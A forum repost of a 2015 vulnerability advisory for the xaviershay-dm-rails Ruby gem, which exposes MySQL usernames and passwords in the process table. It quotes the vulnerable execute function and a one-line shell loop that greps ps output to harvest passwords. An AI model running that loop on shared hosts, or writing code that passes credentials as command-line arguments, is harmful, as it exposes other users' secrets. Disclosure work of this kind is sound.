Jump to content
Sign in to follow this  
Aerosol

xaviershay-dm-rails 0.10.3.8 MySQL Credential Disclosure

Recommended Posts

Title: xaviershay-dm-rails v0.10.3.8 mysql credential exposure
Author: Larry W. Cashdollar, @_larry0
Date: 2015-02-17
Download Site: https://rubygems.org/gems/xaviershay-dm-rails
Vendor: Martin Gamsjaeger, Dan Kubb
Vendor Notified: 2015-02-17
Vendor Contact: notreal [at] rhnh.net
Description: This gem provides the railtie that allows datamapper to hook into rails3 and thus behave like a rails framework component. Just like activerecord does in rails, dm-rails uses the railtie API to hook into rails. The two are actually hooked into rails almost identically.
Vulnerability:
The problem is with the execute function exposing the user credentials to the process table.

Lines 169 - 177 in /datamapper/dm-rails/blob/master/lib/dm-rails/storage.rb:

def execute(statement)
system(
'mysql',
(username.blank? ? '' : "--user=#{username}"),
(password.blank? ? '' : "--password=#{password}"),
'-e',
statement
)
end

OSVDB:118579
Exploit Code:
• $ while (true) do ps -ef |grep [p]assword; done
Advisory: http://www.vapid.dhs.org/advisory.php?v=115

Source

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this  

×
×
  • Create New...